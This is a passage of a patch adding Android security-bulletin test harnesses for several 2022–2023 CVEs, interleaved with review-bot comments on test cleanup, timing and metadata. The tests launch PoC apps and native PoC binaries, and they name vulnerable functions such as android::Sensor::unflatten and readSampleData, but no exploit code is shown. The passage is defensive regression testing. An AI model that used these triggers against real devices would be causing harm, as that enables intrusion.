+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2022_20357 extends NonRootSecurityTestCase {
+
+ // b/214999987
+ // Vulnerability Behaviour : EXIT_VULNERABLE
+ // Vulnerable Function : writeToParcel (As per AOSP code)
+ // Vulnerable Library : libgui (As per AOSP code)
+ @AsbSecurityTest(cveBugId = 214999987)
+ @Test
+ public void testPocCVE_2022_20357() {
+ try {
+ NativePoc.builder()
+ .pocName("CVE-2022-20357")
+ .asserter(assertNotVulnerableExitCode())
+ .build()
+ .run(this);
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_20944.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_20944.java
new file mode 100644
index 0000000..5d412d4
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_20944.java
@@ -0,0 +1,52 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_20944 extends NonRootSecurityTestCase {
+
+ // b/244154558
+ // Vulnerable module : services.jar
+ // Vulnerable module : Not applicable
+ // Is Play Managed : No
+ @AsbSecurityTest(cveBugId = 244154558)
+ @Test
+ public void testPocCVE_2023_20944() {
+ try {
+ final String testPkg = "android.security.cts.CVE_2023_20944_test";
+
+ // Install the test and target apps
+ installPackage("CVE-2023-20944-test.apk");
+ installPackage("CVE-2023-20944-target.apk");
+
+ // Run the test "testCVE_2023_20944"
+ runDeviceTests(testPkg, testPkg + ".DeviceTest", "testCVE_2023_20944");
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
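Review bot: The header comment above the test uses the label "Vulnerable module" twice with contradicting values (`services.jar` and `Not applicable`). Other tests in this directory pair "Vulnerable app" or "Vulnerable package" with "Vulnerable module", so the first line was presumably meant to be something like `// Vulnerable package : services.jar`. Correct the label so the triage metadata for b/244154558 is unambiguous.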
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21107.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21107.java
new file mode 100644
index 0000000..202fb61
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21107.java
@@ -0,0 +1,83 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.device.UserInfo;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.Map;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21107 extends NonRootSecurityTestCase {
+ private int mWorkUserId = -1;
+
+ private AutoCloseable withManagedUser() throws Exception {
+ final ITestDevice device = getDevice();
+ String output =
+ AdbUtils.runCommandLine(
+ "pm create-user --profileOf 0 --managed CVE_2023_21107_TestUser", device);
+ Map<Integer, UserInfo> mapOfUserInfos = device.getUserInfos();
+ for (UserInfo userInfo : mapOfUserInfos.values()) {
+ if (userInfo.userName().equals("CVE_2023_21107_TestUser")) {
+ mWorkUserId = userInfo.userId();
+ }
+ }
+ assumeTrue(mWorkUserId != -1);
+ assumeTrue(device.startUser(mWorkUserId, true /* waitFlag */));
+
+ return new AutoCloseable() {
+ @Override
+ public void close() throws Exception {
+ assumeTrue(device.stopUser(mWorkUserId, true /* waitFlag */, true /* forceFlag */));
+ assumeTrue(device.removeUser(mWorkUserId));
+ AdbUtils.runCommandLine("input keyevent KEYCODE_HOME", device);
+ }
+ };
+ }
+
+ // b/259385017
+ // Vulnerable module : Settings.apk
+ @AsbSecurityTest(cveBugId = 259385017)
+ @Test
+ public void testPocCVE_2023_21107() {
+ try {
+ final String testPkg = "android.security.cts.CVE_2023_21107_test";
+ try (AutoCloseable managedUser = withManagedUser()) {
+ // Install the helper app
+ installPackage("CVE-2023-21107-helper.apk", "--user " + mWorkUserId);
+
+ // Install the test app
+ installPackage("CVE-2023-21107-test.apk");
+
+ // Run the test "testCVE_2023_21107"
+ runDeviceTests(testPkg, testPkg + ".DeviceTest", "testCVE_2023_21107");
+ }
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
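Review bot: `withManagedUser()` can leave the managed profile `CVE_2023_21107_TestUser` behind on the device. If `startUser` fails, the `assumeTrue` throws before the `AutoCloseable` is returned, so nothing removes the user. In `close()`, a false result from `stopUser` aborts through `assumeTrue` before `removeUser` runs. A leftover work profile changes the state later security tests run in, so cleanup should not depend on assumptions holding. The local `output` is never read, and `--profileOf 0` assumes the parent user is user 0.

```java
        // … unchanged: create-user command and lookup of mWorkUserId …
        assumeTrue(mWorkUserId != -1);
        if (!device.startUser(mWorkUserId, true /* waitFlag */)) {
            // Do not leave the profile behind when it cannot be started.
            device.removeUser(mWorkUserId);
            assumeTrue("Unable to start managed user", false);
        }

        return new AutoCloseable() {
            @Override
            public void close() throws Exception {
                try {
                    device.stopUser(mWorkUserId, true /* waitFlag */, true /* forceFlag */);
                } finally {
                    // Always attempt removal, even if the stop request failed.
                    device.removeUser(mWorkUserId);
                    AdbUtils.runCommandLine("input keyevent KEYCODE_HOME", device);
                }
            }
        };
```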
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21118.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21118.java
new file mode 100644
index 0000000..b0eb7c6
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21118.java
@@ -0,0 +1,64 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static com.android.sts.common.NativePocCrashAsserter.assertNoCrash;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.NativePoc;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.sts.common.util.TombstoneUtils;
+import com.android.sts.common.util.TombstoneUtils.Config.BacktraceFilterPattern;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21118 extends NonRootSecurityTestCase {
+
+ @AsbSecurityTest(cveBugId = 269014004)
+ @Test
+ public void testPocCVE_2023_21118() {
+ try {
+ String binaryName = "CVE-2023-21118";
+ String inputFile = "cve_2023_21118.bin";
+
+ String[] signals = {TombstoneUtils.Signals.SIGSEGV};
+ TombstoneUtils.Config crashConfig =
+ new TombstoneUtils.Config()
+ .setProcessPatterns(binaryName)
+ .setBacktraceIncludes(
+ new BacktraceFilterPattern(
+ "libsensor.so", "android::Sensor::unflatten"))
+ .setSignals(signals);
+
+ // Running the PoC for CVE-2023-21118
+ NativePoc.builder()
+ .pocName(binaryName)
+ .resources(inputFile)
+ .asserter(assertNoCrash(crashConfig))
+ .build()
+ .run(this);
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21127.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21127.java
new file mode 100644
index 0000000..1564151
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21127.java
@@ -0,0 +1,67 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static com.android.sts.common.NativePocCrashAsserter.assertNoCrash;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.NativePoc;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.sts.common.util.TombstoneUtils;
+import com.android.sts.common.util.TombstoneUtils.Config.BacktraceFilterPattern;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21127 extends NonRootSecurityTestCase {
+
+ // b/275418191
+ // Vulnerability Behaviour : SIGSEGV in self
+ // Vulnerable Library : libstagefright (As per AOSP code)
+ // Vulnerable Function : readSampleData (As per AOSP code)
+ @AsbSecurityTest(cveBugId = 275418191)
+ @Test
+ public void testPocCVE_2023_21127() {
+ try {
+ // Create the crash config
+ String binary = "CVE-2023-21127";
+ String inputFile = "cve_2023_21127.ogg";
+ TombstoneUtils.Config crashConfig =
+ new TombstoneUtils.Config()
+ .setProcessPatterns(binary)
+ .setBacktraceIncludes(
+ new BacktraceFilterPattern("libstagefright", "readSampleData"))
+ .setSignals(TombstoneUtils.Signals.SIGSEGV);
+
+ // Build and run the Native PoC
+ NativePoc.builder()
+ .pocName(binary)
+ .args(inputFile)
+ .resources(inputFile)
+ .asserter(assertNoCrash(crashConfig))
+ .build()
+ .run(this);
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21129.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21129.java
new file mode 100644
index 0000000..8e815fa
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21129.java
@@ -0,0 +1,52 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21129 extends NonRootSecurityTestCase {
+
+ // b/274759612
+ // Vulnerable app : SystemUI.apk
+ // Vulnerable module : com.android.systemui
+ @AsbSecurityTest(cveBugId = 274759612)
+ @Test
+ public void testPocCVE_2023_21129() {
+ try {
+ final String testPkg = "android.security.cts.CVE_2023_21129";
+
+ // install the app
+ installPackage("CVE-2023-21129.apk");
+
+ // give permission to post bubble notifications
+ AdbUtils.runCommandLine("cmd notification set_bubbles " + testPkg + " 1", getDevice());
+
+ runDeviceTests(testPkg, testPkg + ".DeviceTest", "testBubbleNotification");
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21144.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21144.java
new file mode 100644
index 0000000..064cfbc
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21144.java
@@ -0,0 +1,58 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21144 extends NonRootSecurityTestCase {
+
+ @AsbSecurityTest(cveBugId = 252766417)
+ @Test
+ public void testPocCVE_2023_21144() {
+ ITestDevice device = null;
+ try {
+ device = getDevice();
+ final String testPkg = "android.security.cts.CVE_2023_21144";
+ installPackage("CVE-2023-21144.apk", "-g");
+
+ // Allowing notification listener service for PocListenerService
+ device.executeShellCommand(
+ "cmd notification allow_listener " + testPkg + "/.PocListenerService");
+
+ runDeviceTests(testPkg, testPkg + ".DeviceTest", "testPocCVE_2023_21144");
+ } catch (Exception e) {
+ assumeNoException(e);
+ } finally {
+ // To undo the expanded notification panel
+ try {
+ device.executeShellCommand("input keyevent KEYCODE_HOME");
+ } catch (Exception ignore) {
+ // Ignore
+ }
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21145.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21145.java
new file mode 100644
index 0000000..8c44a58
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21145.java
@@ -0,0 +1,81 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assert.assertTrue;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.ProcessUtil;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.util.RunUtil;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.Optional;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21145 extends NonRootSecurityTestCase {
+ private final int mNoPidFound = -1; /* Default pid */
+
+ @AsbSecurityTest(cveBugId = 265293293)
+ @Test
+ public void testPocCVE_2023_21145() {
+ try {
+ ITestDevice device = getDevice();
+
+ // Install poc and start PipActivity to invoke the vulnerability
+ installPackage("CVE-2023-21145.apk");
+ String pocPkg = "android.security.cts.CVE_2023_21145";
+ device.executeShellCommand("am start-activity " + pocPkg + "/.PipActivity");
+
+ // Wait for the PoC to start
+ final int initialPid = waitAndGetPid(device, mNoPidFound /* initial pid */);
+ assumeTrue("PoC process did not start", initialPid != mNoPidFound);
+
+ // Wait for the PoC to be killed or restart
+ final int latestPid = waitAndGetPid(device, initialPid);
+ assumeTrue("PoC process did not die", latestPid != initialPid);
+
+ // Without fix, the process restarts with new pid
+ assertTrue("Device is vulnerable to b/265293293 !!", latestPid == mNoPidFound);
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+
+ private int waitAndGetPid(ITestDevice device, int initialPid) throws Exception {
+ final long timeout = 10_000L;
+ final String processName = "android.security.cts.CVE_2023_21145:pipActivity";
+
+ // Check if pid has changed
+ int currentPid = mNoPidFound;
+ long startTime = System.currentTimeMillis();
+ while ((currentPid == mNoPidFound || currentPid == initialPid) // Check if pid has changed
+ && System.currentTimeMillis() - startTime <= timeout) {
+ Optional<Integer> pid = ProcessUtil.pidOf(device, processName);
+ currentPid = pid.isPresent() ? pid.get() : mNoPidFound;
+ RunUtil.getDefault().sleep(200); // Sleep for 200 ms before checking pid again
+ }
+ return currentPid;
+ }
+}
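Review bot: In waitAndGetPid the exit of the PoC process and its possible restart share one 10 s budget, so on the second call a process that exits late and restarts after the deadline returns mNoPidFound, and testPocCVE_2023_21145 then reports the device as fixed. Giving the restart its own window once the original pid has disappeared makes a pass depend on the process staying dead rather than on timing; the window length below is a constructed value that needs tuning. The rewrite also stops sleeping once a new pid has been seen and replaces the `isPresent()`/`get()` pair with `orElse(mNoPidFound)`.

```java
private int waitAndGetPid(ITestDevice device, int initialPid) throws Exception {
    // … unchanged: timeout and processName …
    final long restartWindow = 5_000L; // constructed value, tune for slow devices

    int currentPid = mNoPidFound;
    boolean exitSeen = false;
    long deadline = System.currentTimeMillis() + timeout;
    while (System.currentTimeMillis() <= deadline) {
        currentPid = ProcessUtil.pidOf(device, processName).orElse(mNoPidFound);
        if (currentPid != mNoPidFound && currentPid != initialPid) {
            break; // a pid other than the initial one is running
        }
        if (!exitSeen && initialPid != mNoPidFound && currentPid == mNoPidFound) {
            // The original process is gone: allow a full window for a restart
            exitSeen = true;
            deadline = Math.max(deadline, System.currentTimeMillis() + restartWindow);
        }
        RunUtil.getDefault().sleep(200);
    }
    return currentPid;
}
```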
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21238.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21238.java
new file mode 100644
index 0000000..714ace8
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21238.java
@@ -0,0 +1,90 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.UserUtils;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.util.IRunUtil;
+import com.android.tradefed.util.RunUtil;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21238 extends NonRootSecurityTestCase {
+
+ @AsbSecurityTest(cveBugId = 277740848)
+ @Test
+ public void testPocCVE_2023_21238() {
+ try {
+ ITestDevice device = getDevice();
+ final String testPkg = "android.security.cts.CVE_2023_21238";
+
+ // Install test app in device
+ installPackage("CVE-2023-21238.apk", "-g");
+
+ // Create new user and save a screenshot in that user
+ final int currentUserId = device.getCurrentUser();
+ try (AutoCloseable asSecondaryUser =
+ new UserUtils.SecondaryUser(device)
+ .name("cve_2023_21238_user")
+ .doSwitch()
+ .withUser()) {
+ int userId = device.getCurrentUser();
+ device.executeShellCommand("input keyevent KEYCODE_SYSRQ");
+
+ // Wait for screenshot to get saved in the created user
+ final long timeout = 5_000L;
+ final long waitPerIteration = 500L;
+ boolean screenshotSaved = false;
+ IRunUtil runUtil = RunUtil.getDefault();
+ long start = System.currentTimeMillis();
+ do {
+ screenshotSaved =
+ device.executeShellCommand(
+ "content query --user "
+ + userId
+ + " --projection _id --uri"
+ + " content://media/external/images/media/")
+ .contains("Row");
+ if (screenshotSaved) {
+ break;
+ }
+ runUtil.sleep(waitPerIteration);
+ } while (System.currentTimeMillis() - start <= timeout);
+ assumeTrue(
+ "Screenshot was not saved in the created userId = " + userId,
+ screenshotSaved);
+
+ // Switch back to original user
+ assumeTrue(device.switchUser(currentUserId));
+
+ // Run DeviceTest
+ runDeviceTests(testPkg, testPkg + ".DeviceTest", "testPocCVE_2023_21238");
+ }
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
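Review bot: The screenshot-and-poll block inside the try-with-resources of testPocCVE_2023_21238 is repeated line for line in CVE_2023_21279.java, so any later fix to the wait logic has to be made twice. Moving it into a shared helper, for example `static boolean waitForImageRow(ITestDevice device, int userId, long timeoutMs) throws Exception`, would keep the two tests in step. The `.contains("Row")` check matches any image row and presumably relies on the new user starting with none, which is worth stating in a comment next to the query.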
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21239.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21239.java
new file mode 100644
index 0000000..986aee3
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21239.java
@@ -0,0 +1,54 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.UserUtils;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21239 extends NonRootSecurityTestCase {
+
+ @AsbSecurityTest(cveBugId = 274592467)
+ @Test
+ public void testPocCVE_2023_21239() {
+ try {
+ ITestDevice device = getDevice();
+ final String testPkg = "android.security.cts.CVE_2023_21239";
+ installPackage("CVE-2023-21239.apk", "-g");
+
+ try (AutoCloseable asSecondaryUser =
+ new UserUtils.SecondaryUser(device)
+ .name("cve_2023_21239_user")
+ .withUser()) {
+
+ // Run DeviceTest
+ runDeviceTests(testPkg, testPkg + ".DeviceTest", "testCallStyleNotification");
+ }
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21244.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21244.java
new file mode 100644
index 0000000..c784851
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21244.java
@@ -0,0 +1,63 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.SystemUtil;
+import com.android.sts.common.UserUtils;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21244 extends NonRootSecurityTestCase {
+
+ // b/276729064
+ // Vulnerable module : framework.jar (Notification)
+ // Vulnerable app : Not applicable
+ @AsbSecurityTest(cveBugId = 276729064)
+ @Test
+ public void testPocCVE_2023_21244() {
+ try {
+ ITestDevice device = getDevice();
+
+ // Install the test app
+ installPackage("CVE-2023-21244.apk", "-g");
+
+ // Enable "hidden_api_policy" to use the hidden APIs of the class RemoteInputHistoryItem
+ // and run the test with a new user
+ try (AutoCloseable asSecondaryUser =
+ new UserUtils.SecondaryUser(device)
+ .name("cve_2023_21244_user")
+ .withUser();
+ AutoCloseable withHiddenPolicy =
+ SystemUtil.withSetting(device, "global", "hidden_api_policy", "1")) {
+ // Run the test "testCVE_2023_21244"
+ final String testPkg = "android.security.cts.CVE_2023_21244";
+ runDeviceTests(testPkg, testPkg + ".DeviceTest", "testCVE_2023_21244");
+ }
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21253.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21253.java
new file mode 100644
index 0000000..957c459
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21253.java
@@ -0,0 +1,126 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static com.android.tradefed.util.CommandStatus.SUCCESS;
+
+import static org.junit.Assert.assertTrue;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import static java.lang.String.format;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.util.CommandResult;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.ArrayList;
+import java.util.List;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21253 extends NonRootSecurityTestCase {
+ private final List<String> mAssumptionFailureList = new ArrayList<String>();
+ private final List<String> mFailureList = new ArrayList<String>();
+
+ @AsbSecurityTest(cveBugId = 266580022)
+ @Test
+ public void testPocCVE_2023_21253() {
+ try {
+ // Prebuilt apks used in this test are same as used in ApkVerifierTest.java. Dependence
+ // on prebuilt apks cannot be removed because with fix, apks with more than 10 signers
+ // cannot be built due to changes done in 'apksigner'.
+ final String v1Only10SignersApk = "v1-only-10-signers.apk";
+ final String v1Only11SignersApk = "v1-only-11-signers.apk";
+ final String v2Only10SignersApk = "v2-only-10-signers.apk";
+ final String v2Only11SignersApk = "v2-only-11-signers.apk";
+
+ // Check V1 apk signature scheme
+ checkApkSignerScheme(v1Only10SignersApk, v1Only11SignersApk, "V1 apk signature");
+
+ // Check V2 apk signature scheme
+ checkApkSignerScheme(v2Only10SignersApk, v2Only11SignersApk, "V2 apk signature");
+
+ // Fail the test if any failure strings are present in mFailureList
+ assertTrue(
+ format(
+ "Vulnerable to b/266580022! Failures are :- %s",
+ mFailureList.toString()),
+ mFailureList.isEmpty());
+
+ // Assumption failure if any exception messages are present in mAssumptionFailureList
+ assumeTrue(
+ format("Exceptions occurred :- %s", mAssumptionFailureList.toString()),
+ mAssumptionFailureList.isEmpty());
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+
